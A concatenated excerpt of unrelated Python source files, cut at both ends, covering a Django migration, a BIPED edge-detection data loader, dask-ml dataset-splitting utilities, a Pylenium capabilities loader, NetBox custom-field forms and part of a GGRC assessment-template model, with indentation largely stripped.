})
return columns |
py | 7dfce8b964db0124271ec368b119028c20cb2e41 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('competitions', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='News',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('heading', models.CharField(max_length=500, verbose_name='heading')),
('text', models.CharField(max_length=500, null=True, verbose_name='text', blank=True)),
('added_at', models.DateTimeField(auto_now_add=True, verbose_name='added at')),
('modified_at', models.DateTimeField(auto_now=True, verbose_name='modified at')),
('added_by', models.ForeignKey(related_name='News_created', blank=True, editable=False, to=settings.AUTH_USER_MODEL, null=True, verbose_name='author')),
('competition', models.ForeignKey(verbose_name='competition', to='competitions.Competition')),
('modified_by', models.ForeignKey(related_name='News_modified', blank=True, editable=False, to=settings.AUTH_USER_MODEL, null=True, verbose_name='last modified by')),
],
options={
'verbose_name': 'News',
'verbose_name_plural': 'News',
},
bases=(models.Model,),
),
]
|
py | 7dfce963b28e0535c8e8e979d70ca2f2dc45b85a | import numpy as np
import cv2
from random import random
from random import shuffle
from random import randint
from random import uniform
import os
import matplotlib.pyplot as plt
def datastreamer_BIPED(batch_size=10, target_shape=(512, 512), mode='train', base_path='/Users/sarojitauddya/edges_detect/BIPED/edges/', debug=False):
#print(mode)
#print("Entered")
#print(debug)
target_x, target_y = target_shape
edge_base_path = base_path + 'edge_maps/'
imgs_base_path = base_path + 'imgs/'
edge_path = ''
imgs_path = ''
if mode=='train':
edge_path = edge_base_path + 'train/rgbr/real/'
imgs_path = imgs_base_path + 'train/rgbr/real/'
elif mode=='test':
edge_path = edge_base_path + 'test/rgbr/'
imgs_path = imgs_base_path + 'test/rgbr/'
list_edge = os.listdir(edge_path)
list_imgs = os.listdir(imgs_path)
#print(list_edge)
#print(list_imgs)
num_images = 0
while 1:
shuffle(list_edge)
imgs_batch = []
edge_batch = []
for filename in list_edge:
if filename[-3:]!='png' and filename[-3:]!='jpg':
continue
if num_images == batch_size:
num_images = 0
imgs_batch = np.array(imgs_batch)
#print(type(edge_batch))
edge_batch = np.array(edge_batch)
if imgs_batch.shape[0] == 0:
pass
else:
yield imgs_batch, edge_batch
imgs_batch = []
edge_batch = []
image_path = imgs_path + filename[:-3] + 'jpg'
edges_path = edge_path + filename
image = plt.imread(image_path)
edges = plt.imread(edges_path)
if debug:
print("Max Image pixel: "+str(np.max(image)))
print("Min Image pixel: "+str(np.min(image)))
patch_image = np.zeros((target_x,target_y,3))
patch_edges = np.zeros((target_x,target_y,1))
size_x, size_y,_ = image.shape
edges = np.reshape(edges, (size_x, size_y, 1))
            if size_x <= target_x or size_y <= target_y: #May not be the case for BIPED dataset
                print("Oddity in the BIPED dataset")
                patch_image = cv2.resize(image, (target_x, target_y), interpolation = cv2.INTER_CUBIC)
                patch_edges = cv2.resize(edges, (target_x, target_y), interpolation = cv2.INTER_CUBIC)
            else:
                #Generally the size of images in BIPED dataset is 720 by 1280
                #Random patch based training
                start_x, start_y = randint(0, size_x - target_x), randint(0, size_y - target_y)
                patch_image = image[start_x:start_x + target_x, start_y:start_y + target_y,:]
                patch_edges = edges[start_x:start_x + target_x, start_y:start_y + target_y,:]
#Random rotations (0,90,180,270)
#Randomly rotate/flip
rn_un = uniform(0,1)
cv2_object = None
if rn_un <= 0.25:
cv2_object = cv2.ROTATE_90_COUNTERCLOCKWISE #counterclockwise 90
elif rn_un > 0.25 and rn_un<=0.5:
cv2_object = cv2.ROTATE_90_CLOCKWISE #clockwise 90
elif rn_un >0.5 and rn_un<=0.75:
cv2_object = cv2.ROTATE_180 #flip
else:
cv2_object = None
            #NOTE: rotation augmentation is currently disabled; if re-enabled,
            #guard against cv2_object being None (the "no rotation" case above).
            if False:
                patch_image = cv2.rotate(patch_image, cv2_object)
                patch_edges = cv2.rotate(patch_edges, cv2_object)
#Colour based augmentation
#Randomly choose channels
ch1 = randint(0,2)
ch2 = randint(0,2)
ch3 = randint(0,2)
if debug:
print("*****Chosen channels*****")
print(ch1, ch2, ch3)
print("*************************")
patch_image_colour_aug = np.zeros(patch_image.shape)
patch_image_colour_aug[:,:,0] = patch_image[:,:,ch1]
patch_image_colour_aug[:,:,1] = patch_image[:,:,ch2]
patch_image_colour_aug[:,:,2] = patch_image[:,:,ch3]
patch_image = np.uint8(patch_image_colour_aug)
#Thicken edges
kernel = np.ones((2,2))
patch_edges = cv2.dilate(patch_edges, kernel, iterations = 2)
if debug:
plt.imshow(patch_image)
plt.title("Patch Image")
plt.show()
plt.imshow(patch_edges)
plt.title("Patch Edge")
plt.show()
patch_image = np.float32(patch_image)
patch_edges = np.float32(patch_edges)
imgs_batch.append(patch_image/255)
edge_batch.append(patch_edges/np.max(patch_edges))
num_images += 1
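# Usage sketch (the paths are assumptions -- point `base_path` at a local copy
# of the BIPED dataset laid out as edge_maps/ and imgs/): the generator yields
# a batch only once `batch_size` patches have been accumulated.
#
#     gen = datastreamer_BIPED(batch_size=8, target_shape=(512, 512),
#                              mode='train', base_path='/data/BIPED/edges/')
#     imgs, edges = next(gen)   # imgs: (8, 512, 512, 3) floats in [0, 1]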
|
py | 7dfcea2b8462d08da0254784e273b77a2b337239 | """Utilities for splitting datasets.
"""
import itertools
import logging
import numbers
import dask
import dask.array as da
import dask.dataframe as dd
import numpy as np
import sklearn.model_selection as ms
from sklearn.model_selection._split import BaseCrossValidator, _validate_shuffle_split
from sklearn.utils import check_random_state
from dask_ml.utils import check_array, check_matching_blocks
from .._utils import draw_seed
logger = logging.getLogger(__name__)
def _check_blockwise(blockwise):
if blockwise not in {True, False}:
raise ValueError(
"Expected a boolean for 'blockwise " "but got {} instead".format(blockwise)
)
return blockwise
def _maybe_normalize_split_sizes(train_size, test_size):
# adopt scikit-learn's new behavior (complement) now.
if train_size is None and test_size is None:
msg = "test_size and train_size can not both be None"
raise ValueError(msg)
elif any(isinstance(x, numbers.Integral) for x in (train_size, test_size)):
raise ValueError(
"Dask-ML does not support absolute sizes for "
"'train_size' and 'test_size'. Use floats between "
"0 and 1 to specify the fraction of each block "
"that should go to the train and test set."
)
if train_size is not None:
if train_size < 0 or train_size > 1:
raise ValueError(
"'train_size' must be between 0 and 1. " "Got {}".format(train_size)
)
if test_size is None:
test_size = 1 - train_size
if test_size is not None:
if test_size < 0 or test_size > 1:
raise ValueError(
"'test_size' be between 0 and 1. " "Got {}".format(test_size)
)
if train_size is None:
train_size = 1 - test_size
if abs(1 - (train_size + test_size)) > 0.001:
raise ValueError(
"The sum of 'train_size' and 'test_size' must be 1. "
"train_size: {} test_size: {}".format(train_size, test_size)
)
return train_size, test_size
def _generate_idx(n, seed, n_train, n_test):
"""Generate train, test indices for a length-n array.
Parameters
----------
n : int
The length of the array
seed : int
Seed for a RandomState
n_train, n_test : int, 0 < n_train, n_test < n
Number of samples to use for the train or
test index.
Notes
-----
"""
idx = check_random_state(seed).permutation(n)
ind_test = idx[:n_test]
ind_train = idx[n_test : n_train + n_test]
return ind_train, ind_test
class ShuffleSplit(BaseCrossValidator):
"""Random permutation cross-validator.
Yields indices to split data into training and test sets.
.. warning::
By default, this performs a blockwise-shuffle. That is,
each block is shuffled internally, but data are not shuffled
between blocks. If your data is ordered, then set ``blockwise=False``.
Note: contrary to other cross-validation strategies, random splits
do not guarantee that all folds will be different, although this is
still very likely for sizeable datasets.
Parameters
----------
n_splits : int, default 10
Number of re-shuffling & splitting iterations.
    test_size : float or None, default=0.1
        Should be between 0.0 and 1.0 and represent the proportion
        of each block to include in the test split. Absolute (integer)
        sizes are not supported. If None, the value is set to the
        complement of the train size.
    train_size : float or None, default=None
        Should be between 0.0 and 1.0 and represent the proportion
        of each block to include in the train split. Absolute (integer)
        sizes are not supported. If None, the value is automatically
        set to the complement of the test size.
blockwise : bool, default True
Whether to shuffle data only within blocks (True), or allow data to
be shuffled between blocks (False). Shuffling between blocks can
be much more expensive, especially in distributed environments.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
"""
def __init__(
self,
n_splits=10,
test_size=0.1,
train_size=None,
blockwise=True,
random_state=None,
):
self.n_splits = n_splits
self.test_size = test_size
self.train_size = train_size
self.random_state = random_state
self.blockwise = _check_blockwise(blockwise)
def split(self, X, y=None, groups=None):
X = check_array(X)
rng = check_random_state(self.random_state)
for i in range(self.n_splits):
seeds = draw_seed(rng, 0, 2 ** 32 - 1, size=len(X.chunks[0]), dtype="uint")
if self.blockwise:
yield self._split_blockwise(X, seeds)
else:
yield self._split(X)
def _split_blockwise(self, X, seeds):
chunks = X.chunks[0]
train_pct, test_pct = _maybe_normalize_split_sizes(
self.train_size, self.test_size
)
sizes = [_validate_shuffle_split(c, test_pct, train_pct) for c in chunks]
objs = [
dask.delayed(_generate_idx, nout=2)(chunksize, seed, n_train, n_test)
for chunksize, seed, (n_train, n_test) in zip(chunks, seeds, sizes)
]
train_objs, test_objs = zip(*objs)
offsets = np.hstack([0, np.cumsum(chunks)])
train_idx = da.concatenate(
[
da.from_delayed(x + offset, (train_size,), "i8")
for x, chunksize, (train_size, _), offset in zip(
train_objs, chunks, sizes, offsets
)
]
)
test_idx = da.concatenate(
[
da.from_delayed(x + offset, (test_size,), "i8")
for x, chunksize, (_, test_size), offset in zip(
test_objs, chunks, sizes, offsets
)
]
)
return train_idx, test_idx
def _split(self, X):
raise NotImplementedError(
"ShuffleSplit with `blockwise=False` has " "not been implemented yet."
)
def get_n_splits(self, X=None, y=None, groups=None):
return self.n_splits
def _generate_offset_idx(n, start, stop, offset, seed):
if seed is not None:
idx = check_random_state(seed).permutation(n)
else:
idx = np.arange(n)
return idx[start - offset : stop - offset] + offset
class KFold(BaseCrossValidator):
"""K-Folds cross-validator
Provides train/test indices to split data in train/test sets. Split
dataset into k consecutive folds (without shuffling by default).
Each fold is then used once as a validation while the k - 1 remaining
folds form the training set.
Parameters
----------
n_splits : int, default=5
Number of folds. Must be at least 2.
shuffle : boolean, optional
Whether to shuffle the data before splitting into batches.
random_state : int, RandomState instance or None, optional, default=None
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`. Used when ``shuffle`` == True.
"""
def __init__(self, n_splits=5, shuffle=False, random_state=None):
self.n_splits = n_splits
self.shuffle = shuffle
self.random_state = random_state
def split(self, X, y=None, groups=None):
X = check_array(X)
n_samples = X.shape[0]
n_splits = self.n_splits
        fold_sizes = np.full(n_splits, n_samples // n_splits, dtype=int)
fold_sizes[: n_samples % n_splits] += 1
chunks = X.chunks[0]
seeds = [None] * len(chunks)
if self.shuffle:
rng = check_random_state(self.random_state)
seeds = draw_seed(rng, 0, 2 ** 32 - 1, size=len(chunks), dtype="uint")
test_current = 0
for fold_size in fold_sizes:
test_start, test_stop = test_current, test_current + fold_size
yield self._split(test_start, test_stop, n_samples, chunks, seeds)
test_current = test_stop
def _split(self, test_start, test_stop, n_samples, chunks, seeds):
train_objs = []
test_objs = []
train_sizes = []
test_sizes = []
offset = 0
for chunk, seed in zip(chunks, seeds):
start, stop = offset, offset + chunk
test_id_start = max(test_start, start)
test_id_stop = min(test_stop, stop)
if test_id_start < test_id_stop:
test_objs.append(
dask.delayed(_generate_offset_idx)(
chunk, test_id_start, test_id_stop, offset, seed
)
)
test_sizes.append(test_id_stop - test_id_start)
train_id_stop = min(test_id_start, stop)
if train_id_stop > start:
train_objs.append(
dask.delayed(_generate_offset_idx)(
chunk, start, train_id_stop, offset, seed
)
)
train_sizes.append(train_id_stop - start)
train_id_start = max(test_id_stop, start)
if train_id_start < stop:
train_objs.append(
dask.delayed(_generate_offset_idx)(
chunk, train_id_start, stop, offset, seed
)
)
train_sizes.append(stop - train_id_start)
offset = stop
train_idx = da.concatenate(
[
da.from_delayed(obj, (train_size,), "i8")
for obj, train_size in zip(train_objs, train_sizes)
]
)
test_idx = da.concatenate(
[
da.from_delayed(obj, (test_size,), "i8")
for obj, test_size in zip(test_objs, test_sizes)
]
)
return train_idx, test_idx
def get_n_splits(self, X=None, y=None, groups=None):
return self.n_splits
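# Usage sketch: each split yields a pair of dask integer arrays indexing rows
# of X; nothing is computed until the indices are actually used.
#
#     import dask.array as da
#     X = da.ones((100, 4), chunks=(25, 4))
#     for train_idx, test_idx in KFold(n_splits=5).split(X):
#         print(train_idx.shape, test_idx.shape)   # lazy dask index arrays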
def _blockwise_slice(arr, idx):
"""Slice an array that is blockwise-aligned with idx.
Parameters
----------
arr : Dask array
idx : Dask array
Should have the following properties
* Same blocks as `arr` along the first dimension
* Contains only integers
* Each block's values should be between ``[0, len(block))``
Returns
-------
sliced : dask.Array
"""
objs = []
offsets = np.hstack([0, np.cumsum(arr.chunks[0])[:-1]])
for i, (x, idx2) in enumerate(
zip(arr.to_delayed().ravel(), idx.to_delayed().ravel())
):
idx3 = idx2 - offsets[i]
objs.append(x[idx3])
shapes = idx.chunks[0]
if arr.ndim == 2:
P = arr.shape[1]
shapes = [(x, P) for x in shapes]
else:
shapes = [(x,) for x in shapes]
sliced = da.concatenate(
[
da.from_delayed(x, shape=shape, dtype=arr.dtype)
for x, shape in zip(objs, shapes)
]
)
return sliced
def train_test_split(*arrays, **options):
"""Split arrays into random train and test matricies.
Parameters
----------
*arrays : Sequence of Dask Arrays
test_size : float or int, default 0.1
train_size : float or int, optional
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
shuffle : bool, default True
Whether to shuffle the data before splitting.
blockwise : bool, optional.
Whether to shuffle data only within blocks (True), or allow data to
be shuffled between blocks (False). Shuffling between blocks can
be much more expensive, especially in distributed environments.
The default behavior depends on the types in arrays. For Dask Arrays,
the default is True (data are not shuffled between blocks). For Dask
DataFrames, the default and only allowed value is False (data are
shuffled between blocks).
Returns
-------
splitting : list, length=2 * len(arrays)
List containing train-test split of inputs
Examples
--------
>>> import dask.array as da
>>> from dask_ml.datasets import make_regression
>>> X, y = make_regression(n_samples=125, n_features=4, chunks=50,
... random_state=0)
>>> X_train, X_test, y_train, y_test = train_test_split(X, y,
... random_state=0)
>>> X_train
dask.array<concatenate, shape=(113, 4), dtype=float64, chunksize=(45, 4)>
>>> X_train.compute()[:2]
array([[ 0.12372191, 0.58222459, 0.92950511, -2.09460307],
[ 0.99439439, -0.70972797, -0.27567053, 1.73887268]])
"""
test_size = options.pop("test_size", None)
train_size = options.pop("train_size", None)
random_state = options.pop("random_state", None)
shuffle = options.pop("shuffle", True)
blockwise = options.pop("blockwise", None)
if train_size is None and test_size is None:
        # all other validation is done elsewhere.
test_size = 0.1
if options:
raise TypeError("Unexpected options {}".format(options))
if not shuffle:
raise NotImplementedError("'shuffle=False' is not currently supported.")
if all(isinstance(arr, (dd.Series, dd.DataFrame)) for arr in arrays):
check_matching_blocks(*arrays)
if blockwise is None:
blockwise = False
rng = check_random_state(random_state)
rng = draw_seed(rng, 0, 2 ** 32 - 1, dtype="uint")
return list(
itertools.chain.from_iterable(
arr.random_split([train_size, test_size], random_state=rng)
for arr in arrays
)
)
elif all(isinstance(arr, da.Array) for arr in arrays):
if blockwise is None:
blockwise = True
splitter = ShuffleSplit(
n_splits=1,
test_size=test_size,
train_size=train_size,
blockwise=blockwise,
random_state=random_state,
)
train_idx, test_idx = next(splitter.split(*arrays))
train_test_pairs = (
(_blockwise_slice(arr, train_idx), _blockwise_slice(arr, test_idx))
for arr in arrays
)
return list(itertools.chain.from_iterable(train_test_pairs))
else:
logger.warning("Mixture of types in 'arrays'. Falling back to scikit-learn.")
return ms.train_test_split(
*arrays,
test_size=test_size,
train_size=train_size,
random_state=random_state,
shuffle=shuffle
)
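# Sketch of the dask.dataframe code path above (illustrative only; `pdf` and
# `ddf` are assumed variables): frames are split with `random_split`, and
# `blockwise` may only be False for them, i.e. rows may move between partitions.
#
#   import dask.dataframe as dd
#   ddf = dd.from_pandas(pdf, npartitions=4)
#   train_ddf, test_ddf = train_test_split(ddf, train_size=0.8, test_size=0.2,
#                                          random_state=0)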
|
py | 7dfceafb0e652164e3d1009e26ff8183a7011ba0 | from typing import Dict
from pytest import UsageError
from pylenium.exceptions.exceptions import NoCapabilitiesDictionaryException
from os.path import isfile
import importlib.util
def is_py_file(path: str) -> str:
"""
    Raise a pytest UsageError if the path provided is not a valid .py file
:param path: the file path passed as an arg to some command line options
:return: the path if it was successfully located
"""
if not path.endswith(".py"):
raise UsageError(f"File path provided: {path} was not a .py file")
if not isfile(path):
raise UsageError(f"Pylenium was unable to find the file provided at: {path}")
return path
def parse_capabilities_from_disk(path: str) -> Dict:
"""
    Takes the path provided to --browser-capabilities; loads it and attempts to discover a 'capabilities' dictionary.
Note: This must be explicitly called 'capabilities' and should be of <class 'dict'>
:param path: the path on the file system to load
:return: The dictionary of desired capabilities that we found
"""
is_py_file(path)
spec = importlib.util.spec_from_file_location(name="py_desired_caps", location=path)
mod = importlib.util.module_from_spec(spec)
spec.loader.exec_module(mod)
try:
caps = mod.capabilities
if not isinstance(caps, Dict):
raise ValueError(
f"The .py file provided: {path} contained a 'capabilities' attribute, but it was not of"
f"type<Dict>"
)
return caps
except AttributeError:
raise NoCapabilitiesDictionaryException(
f"The .py file provided: {path} did not have a 'capabilities' attribute"
f"Make sure it contains one, explicitly called 'capabilities'"
) from None
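# Illustrative capabilities file (an assumption of what a valid input looks
# like): the module only needs a top-level dict literally named `capabilities`.
#
#   # desired_caps.py
#   capabilities = {
#       "browserName": "chrome",
#       "acceptInsecureCerts": True,
#   }
#
# which would then be loaded via parse_capabilities_from_disk("desired_caps.py").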
|
py | 7dfceb39009879c5df7db62c4cb2694f3b58d489 | from __future__ import unicode_literals
from collections import OrderedDict
from django import forms
from django.contrib.auth.models import User
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ObjectDoesNotExist
from mptt.forms import TreeNodeMultipleChoiceField
from taggit.forms import TagField
from taggit.models import Tag
from dcim.models import DeviceRole, Platform, Region, Site
from tenancy.models import Tenant, TenantGroup
from utilities.forms import (
add_blank_choice, BootstrapMixin, BulkEditForm, FilterChoiceField, FilterTreeNodeMultipleChoiceField, LaxURLField,
JSONField, SlugField,
)
from .constants import (
CF_FILTER_DISABLED, CF_TYPE_BOOLEAN, CF_TYPE_DATE, CF_TYPE_INTEGER, CF_TYPE_SELECT, CF_TYPE_URL,
OBJECTCHANGE_ACTION_CHOICES,
)
from .models import ConfigContext, CustomField, CustomFieldValue, ImageAttachment, ObjectChange
#
# Custom fields
#
def get_custom_fields_for_model(content_type, filterable_only=False, bulk_edit=False):
"""
Retrieve all CustomFields applicable to the given ContentType
"""
field_dict = OrderedDict()
custom_fields = CustomField.objects.filter(obj_type=content_type)
if filterable_only:
custom_fields = custom_fields.exclude(filter_logic=CF_FILTER_DISABLED)
for cf in custom_fields:
field_name = 'cf_{}'.format(str(cf.name))
initial = cf.default if not bulk_edit else None
# Integer
if cf.type == CF_TYPE_INTEGER:
field = forms.IntegerField(required=cf.required, initial=initial)
# Boolean
elif cf.type == CF_TYPE_BOOLEAN:
choices = (
(None, '---------'),
(1, 'True'),
(0, 'False'),
)
if initial is not None and initial.lower() in ['true', 'yes', '1']:
initial = 1
elif initial is not None and initial.lower() in ['false', 'no', '0']:
initial = 0
else:
initial = None
field = forms.NullBooleanField(
required=cf.required, initial=initial, widget=forms.Select(choices=choices)
)
# Date
elif cf.type == CF_TYPE_DATE:
field = forms.DateField(required=cf.required, initial=initial, help_text="Date format: YYYY-MM-DD")
# Select
elif cf.type == CF_TYPE_SELECT:
choices = [(cfc.pk, cfc) for cfc in cf.choices.all()]
if not cf.required or bulk_edit or filterable_only:
choices = [(None, '---------')] + choices
# Check for a default choice
default_choice = None
if initial:
try:
default_choice = cf.choices.get(value=initial).pk
except ObjectDoesNotExist:
pass
field = forms.TypedChoiceField(choices=choices, coerce=int, required=cf.required, initial=default_choice)
# URL
elif cf.type == CF_TYPE_URL:
field = LaxURLField(required=cf.required, initial=initial)
# Text
else:
field = forms.CharField(max_length=255, required=cf.required, initial=initial)
field.model = cf
field.label = cf.label if cf.label else cf.name.replace('_', ' ').capitalize()
if cf.description:
field.help_text = cf.description
field_dict[field_name] = field
return field_dict
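# Illustrative return value (assumption): for a ContentType with a single
# integer custom field named "bandwidth", the function returns roughly
#   {"cf_bandwidth": forms.IntegerField(required=..., initial=...)}
# i.e. every generated form field is keyed as "cf_<custom field name>".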
class CustomFieldForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
self.custom_fields = []
self.obj_type = ContentType.objects.get_for_model(self._meta.model)
super(CustomFieldForm, self).__init__(*args, **kwargs)
# Add all applicable CustomFields to the form
custom_fields = []
for name, field in get_custom_fields_for_model(self.obj_type).items():
self.fields[name] = field
custom_fields.append(name)
self.custom_fields = custom_fields
# If editing an existing object, initialize values for all custom fields
if self.instance.pk:
existing_values = CustomFieldValue.objects.filter(obj_type=self.obj_type, obj_id=self.instance.pk)\
.select_related('field')
for cfv in existing_values:
self.initial['cf_{}'.format(str(cfv.field.name))] = cfv.serialized_value
def _save_custom_fields(self):
for field_name in self.custom_fields:
try:
cfv = CustomFieldValue.objects.select_related('field').get(field=self.fields[field_name].model,
obj_type=self.obj_type,
obj_id=self.instance.pk)
except CustomFieldValue.DoesNotExist:
# Skip this field if none exists already and its value is empty
if self.cleaned_data[field_name] in [None, '']:
continue
cfv = CustomFieldValue(
field=self.fields[field_name].model,
obj_type=self.obj_type,
obj_id=self.instance.pk
)
cfv.value = self.cleaned_data[field_name]
cfv.save()
def save(self, commit=True):
obj = super(CustomFieldForm, self).save(commit)
# Handle custom fields the same way we do M2M fields
if commit:
self._save_custom_fields()
else:
self.save_custom_fields = self._save_custom_fields
return obj
class CustomFieldBulkEditForm(BulkEditForm):
def __init__(self, *args, **kwargs):
super(CustomFieldBulkEditForm, self).__init__(*args, **kwargs)
self.custom_fields = []
self.obj_type = ContentType.objects.get_for_model(self.model)
# Add all applicable CustomFields to the form
custom_fields = get_custom_fields_for_model(self.obj_type, bulk_edit=True).items()
for name, field in custom_fields:
# Annotate non-required custom fields as nullable
if not field.required:
self.nullable_fields.append(name)
field.required = False
self.fields[name] = field
# Annotate this as a custom field
self.custom_fields.append(name)
class CustomFieldFilterForm(forms.Form):
def __init__(self, *args, **kwargs):
self.obj_type = ContentType.objects.get_for_model(self.model)
super(CustomFieldFilterForm, self).__init__(*args, **kwargs)
# Add all applicable CustomFields to the form
custom_fields = get_custom_fields_for_model(self.obj_type, filterable_only=True).items()
for name, field in custom_fields:
field.required = False
self.fields[name] = field
#
# Tags
#
class TagForm(BootstrapMixin, forms.ModelForm):
slug = SlugField()
class Meta:
model = Tag
fields = ['name', 'slug']
class AddRemoveTagsForm(forms.Form):
def __init__(self, *args, **kwargs):
super(AddRemoveTagsForm, self).__init__(*args, **kwargs)
# Add add/remove tags fields
self.fields['add_tags'] = TagField(required=False)
self.fields['remove_tags'] = TagField(required=False)
#
# Config contexts
#
class ConfigContextForm(BootstrapMixin, forms.ModelForm):
regions = TreeNodeMultipleChoiceField(
queryset=Region.objects.all(),
required=False
)
data = JSONField()
class Meta:
model = ConfigContext
fields = [
'name', 'weight', 'description', 'is_active', 'regions', 'sites', 'roles', 'platforms', 'tenant_groups',
'tenants', 'data',
]
class ConfigContextFilterForm(BootstrapMixin, forms.Form):
q = forms.CharField(
required=False,
label='Search'
)
region = FilterTreeNodeMultipleChoiceField(
queryset=Region.objects.all(),
to_field_name='slug'
)
site = FilterChoiceField(
queryset=Site.objects.all(),
to_field_name='slug'
)
role = FilterChoiceField(
queryset=DeviceRole.objects.all(),
to_field_name='slug'
)
platform = FilterChoiceField(
queryset=Platform.objects.all(),
to_field_name='slug'
)
tenant_group = FilterChoiceField(
queryset=TenantGroup.objects.all(),
to_field_name='slug'
)
tenant = FilterChoiceField(
queryset=Tenant.objects.all(),
to_field_name='slug'
)
#
# Image attachments
#
class ImageAttachmentForm(BootstrapMixin, forms.ModelForm):
class Meta:
model = ImageAttachment
fields = ['name', 'image']
#
# Change logging
#
class ObjectChangeFilterForm(BootstrapMixin, CustomFieldFilterForm):
model = ObjectChange
q = forms.CharField(
required=False,
label='Search'
)
# TODO: Change time_0 and time_1 to time_after and time_before for django-filter==2.0
time_0 = forms.DateTimeField(
label='After',
required=False,
widget=forms.TextInput(
attrs={'placeholder': 'YYYY-MM-DD hh:mm:ss'}
)
)
time_1 = forms.DateTimeField(
label='Before',
required=False,
widget=forms.TextInput(
attrs={'placeholder': 'YYYY-MM-DD hh:mm:ss'}
)
)
action = forms.ChoiceField(
choices=add_blank_choice(OBJECTCHANGE_ACTION_CHOICES),
required=False
)
user = forms.ModelChoiceField(
queryset=User.objects.order_by('username'),
required=False
)
|
py | 7dfceba4c8be608d31ffa0df5f8a9dd22e6cc56a | # Copyright (C) 2019 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""A module containing the implementation of the assessment template entity."""
from collections import OrderedDict
from sqlalchemy import orm
from sqlalchemy.orm import validates
from werkzeug.exceptions import Forbidden
from ggrc import db
from ggrc.access_control.roleable import Roleable
from ggrc import login
from ggrc.builder import simple_property
from ggrc.models import assessment
from ggrc.models import audit
from ggrc.models import mixins
from ggrc.models import relationship
from ggrc.models.mixins import base
from ggrc.models.mixins import clonable
from ggrc.models.mixins import issue_tracker
from ggrc.models.exceptions import ValidationError
from ggrc.models.reflection import AttributeInfo
from ggrc.models import reflection
from ggrc.models.types import JsonType
from ggrc.services import signals
from ggrc.fulltext.mixin import Indexed
from ggrc.rbac.permissions import permissions_for
def _hint_verifier_assignees(actual_people_label, control_people_label,
risk_people_label):
"""Returns description default verifiers/assignees fields"""
description = "For all Assessment Types except of " \
"Control and Risk options are:\n{}\[email protected]\n" \
"For Assessment type of Control options are:\n{}\n" \
"[email protected]\n" \
"For Assessment type of Risk options are:\n{}\n" \
"[email protected]".format(
"\n".join(actual_people_label.values()),
"\n".join(control_people_label.values()),
"\n".join(risk_people_label.values()))
return description
class AssessmentTemplate(assessment.AuditRelationship,
relationship.Relatable,
mixins.Titled,
mixins.CustomAttributable,
Roleable,
issue_tracker.IssueTrackedWithConfig,
base.ContextRBAC,
mixins.Slugged,
mixins.Stateful,
clonable.MultiClonable,
Indexed,
db.Model):
"""A class representing the assessment template entity.
An Assessment Template is a template that allows users for easier creation of
multiple Assessments that are somewhat similar to each other, avoiding the
need to repeatedly define the same set of properties for every new Assessment
object.
"""
__tablename__ = "assessment_templates"
_mandatory_default_people = ("assignees",)
PER_OBJECT_CUSTOM_ATTRIBUTABLE = True
RELATED_TYPE = 'assessment'
# the type of the Default Assessment Type
template_object_type = db.Column(db.String, nullable=True)
# whether to use the control test plan as a procedure
test_plan_procedure = db.Column(db.Boolean, nullable=False, default=False)
# procedure description
procedure_description = db.Column(db.Text, nullable=False, default=u"")
# the people that should be assigned by default to each assessment created
  # within the related audit
default_people = db.Column(JsonType, nullable=False)
# parent audit
audit_id = db.Column(db.Integer, db.ForeignKey('audits.id'), nullable=False)
# labels to show to the user in the UI for various default people values
DEFAULT_PEOPLE_LABELS = OrderedDict([
("Admin", "Object Admins"),
("Audit Lead", "Audit Captain"),
("Auditors", "Auditors"),
("Principal Assignees", "Principal Assignees"),
("Secondary Assignees", "Secondary Assignees"),
("Primary Contacts", "Primary Contacts"),
("Secondary Contacts", "Secondary Contacts"),
("Control Operators", "Control Operators"),
("Control Owners", "Control Owners"),
("Risk Owners", "Risk Owners"),
("Other Contacts", "Other Contacts"),
])
  # labels to show as a hint for all Assessment Types except Control and Risk
_DEFAULT_PEOPLE_LABELS_ACTUAL = OrderedDict([
("Admin", "Object Admins"),
("Audit Lead", "Audit Captain"),
("Auditors", "Auditors"),
("Principal Assignees", "Principal Assignees"),
("Secondary Assignees", "Secondary Assignees"),
("Primary Contacts", "Primary Contacts"),
("Secondary Contacts", "Secondary Contacts"),
])
# labels to show as hint in Default Assignees/Verifiers for Control
_DEFAULT_PEOPLE_LABELS_CONTROL = OrderedDict([
("Admin", "Object Admins"),
("Audit Lead", "Audit Captain"),
("Auditors", "Auditors"),
("Principal Assignees", "Principal Assignees"),
("Secondary Assignees", "Secondary Assignees"),
("Control Operators", "Control Operators"),
("Control Owners", "Control Owners"),
("Other Contacts", "Other Contacts"),
])
# labels to show as hint in Default Assignees/Verifiers for Risk
_DEFAULT_PEOPLE_LABELS_RISK = OrderedDict([
("Admin", "Object Admins"),
("Audit Lead", "Audit Captain"),
("Auditors", "Auditors"),
("Principal Assignees", "Principal Assignees"),
("Secondary Assignees", "Secondary Assignees"),
("Risk Owners", "Risk Owners"),
("Other Contacts", "Other Contacts"),
])
_title_uniqueness = False
DRAFT = 'Draft'
ACTIVE = 'Active'
DEPRECATED = 'Deprecated'
VALID_STATES = (DRAFT, ACTIVE, DEPRECATED, )
# REST properties
_api_attrs = reflection.ApiAttributes(
'template_object_type',
'test_plan_procedure',
'procedure_description',
'default_people',
'audit',
reflection.Attribute('issue_tracker', create=False, update=False),
reflection.Attribute('archived', create=False, update=False),
reflection.Attribute(
'DEFAULT_PEOPLE_LABELS', create=False, update=False),
)
_fulltext_attrs = [
"archived"
]
_custom_publish = {
'audit': audit.build_audit_stub,
}
DEFAULT_ASSESSMENT_TYPE_OPTIONS = ("Access Groups",
"Account Balances",
"Data Assets",
"Facilities",
"Key Reports",
"Markets",
"Org Groups",
"Processes",
"Product Groups",
"Products",
"Systems",
"Technology Environments",
"Vendors",
"Contracts",
"Controls",
"Objectives",
"Policies",
